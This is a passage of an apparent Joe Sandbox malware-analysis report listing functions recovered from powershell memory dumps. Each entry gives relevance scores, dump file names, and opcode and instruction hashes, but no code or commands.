          • Opcode Fuzzy Hash: 973a7e9294378f676339d42f59498c48325ba4f432788857f1cd22e920f2ce41
          • Instruction Fuzzy Hash: 71C1AF36B00215DFDB148F9CC494BAAB7B2BFC4615F64985AE8069B394CB71DC81CFA1
          Function 075E64A8 Relevance: 7.7, Strings: 6, Instructions: 241COMMON
          Download Yara Rule
          Strings
          Memory Dump Source
          • Source File: 00000002.00000002.91923702286.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_75e0000_powershell.jbxd
          Similarity
          • API ID:
          • String ID: 4\Dm$4\Dm$4\Dm$4\Dm$@bDm$@bDm
          • API String ID: 0-1128988494
          • Opcode ID: 0b8b4f7d2ad591f4b2e919c06712e48512745495397efadb31b9fa6cdeb59d42
          • Instruction ID: 846dd90b4f1445efbce4563897025a0521fdf9cd658397c2d937d4fbae90c34b
          • Opcode Fuzzy Hash: 0b8b4f7d2ad591f4b2e919c06712e48512745495397efadb31b9fa6cdeb59d42
          • Instruction Fuzzy Hash: 229186B4B00205EBE718CB94C145AAAB7F6FF99350F64C06AD8056F755CB72EC82CB91
          Function 075E5F18 Relevance: 7.5, Strings: 6, Instructions: 48COMMON
          Download Yara Rule
          Strings
          Memory Dump Source
          • Source File: 00000002.00000002.91923702286.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_75e0000_powershell.jbxd
          Similarity
          • API ID:
          • String ID: (D8m$(D8m$(D8m$(D8m$(D8m$(W9j
          • API String ID: 0-2435424947
          • Opcode ID: 365699161d2e3911904a2bec7adac17ba5f455d3f7c0b4a136e694950551c95f
          • Instruction ID: 3be954ff1ae1524f4397f8506497ff2fa8de96f0adeb45c5d98274bf3bb91c29
          • Opcode Fuzzy Hash: 365699161d2e3911904a2bec7adac17ba5f455d3f7c0b4a136e694950551c95f
          • Instruction Fuzzy Hash: 92017BF5B01326A7E71C1A78581466B325B6BC5745B11803AD6064FB85FE759C2343E3
          Function 075E2F28 Relevance: 5.3, Strings: 4, Instructions: 279COMMON
          Download Yara Rule
          Strings
          Memory Dump Source
          • Source File: 00000002.00000002.91923702286.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_75e0000_powershell.jbxd
          Similarity
          • API ID:
          • String ID: P0Bm$P0Bm$\}?m$\}?m
          • API String ID: 0-2796545573
          • Opcode ID: 1d5cf6ccc35013c8482bbb97817b4a54f1ad14e7aa53d0eda94916347fe02bcd
          • Instruction ID: d5c88c4ff30963499ecb3c1646e985f8696ed6b971adf328c43ff8b92938fca1
          • Opcode Fuzzy Hash: 1d5cf6ccc35013c8482bbb97817b4a54f1ad14e7aa53d0eda94916347fe02bcd
          • Instruction Fuzzy Hash: 579127B17043529FDB1C9A69C850BBBBBAABFC1650F24846FD8058F391DA32DC41C7A1
          Function 075EECC5 Relevance: 5.2, Strings: 4, Instructions: 209COMMON
          Download Yara Rule
          Strings
          Memory Dump Source
          • Source File: 00000002.00000002.91923702286.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_75e0000_powershell.jbxd
          Similarity
          • API ID:
          • String ID: P0Bm$P0Bm$GDm$GDm
          • API String ID: 0-2747310868
          • Opcode ID: 89652183849076f9e824f15dbc39d81deef299a7bfb8e84f6c1b6ee24987a968
          • Instruction ID: ae4ed0881f6a8e4eabe1a8128e5e2b6bf91f52ed345e304466f06f4c4cf02b89
          • Opcode Fuzzy Hash: 89652183849076f9e824f15dbc39d81deef299a7bfb8e84f6c1b6ee24987a968
          • Instruction Fuzzy Hash: 5171F5B5B202129FFB288E65C512BFAB7AABFC5650F18845ED4158F394CB31DC42C7A1
          Function 075EF96D Relevance: 5.2, Strings: 4, Instructions: 194COMMON
          Download Yara Rule
          Strings
          Memory Dump Source
          • Source File: 00000002.00000002.91923702286.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_75e0000_powershell.jbxd
          Similarity
          • API ID:
          • String ID: P0Bm$P0Bm$GDm$GDm
          • API String ID: 0-2747310868
          • Opcode ID: 55c2054b6312bbe1a9bb1674846324aabc2d14386808bd365c391a1516251cb7
          • Instruction ID: 657d82130e6423528a2d14c9a771c3c0626636b88074e739e83d9c3201f9a6c2
          • Opcode Fuzzy Hash: 55c2054b6312bbe1a9bb1674846324aabc2d14386808bd365c391a1516251cb7
          • Instruction Fuzzy Hash: BE61E675B00202DFDB589F689450BAAB7AABF89610F24C0AAD4469F394CF71DC41CBA1
          Function 08E00000 Relevance: 5.1, Strings: 4, Instructions: 144COMMON
          Download Yara Rule
          Strings
          Memory Dump Source
          • Source File: 00000002.00000002.91928051440.0000000008E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E00000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_8e00000_powershell.jbxd
          Similarity
          • API ID:
          • String ID: P0Bm$XRr$XRr$GDm
          • API String ID: 0-2356570145
          • Opcode ID: 5c3a82a0762239c4d71e6b3e56eb67a968d07b28e0f2ce284bcec8d07718d745
          • Instruction ID: 7754f9603d4e0d8a69a80187a6bed5739af471b18e0682522a8324587868324e
          • Opcode Fuzzy Hash: 5c3a82a0762239c4d71e6b3e56eb67a968d07b28e0f2ce284bcec8d07718d745
          • Instruction Fuzzy Hash: 3551F132A04680DFDB218B2CC504BA9BBB1AF46316F2998DAD444AF2D2C771DDC5CF61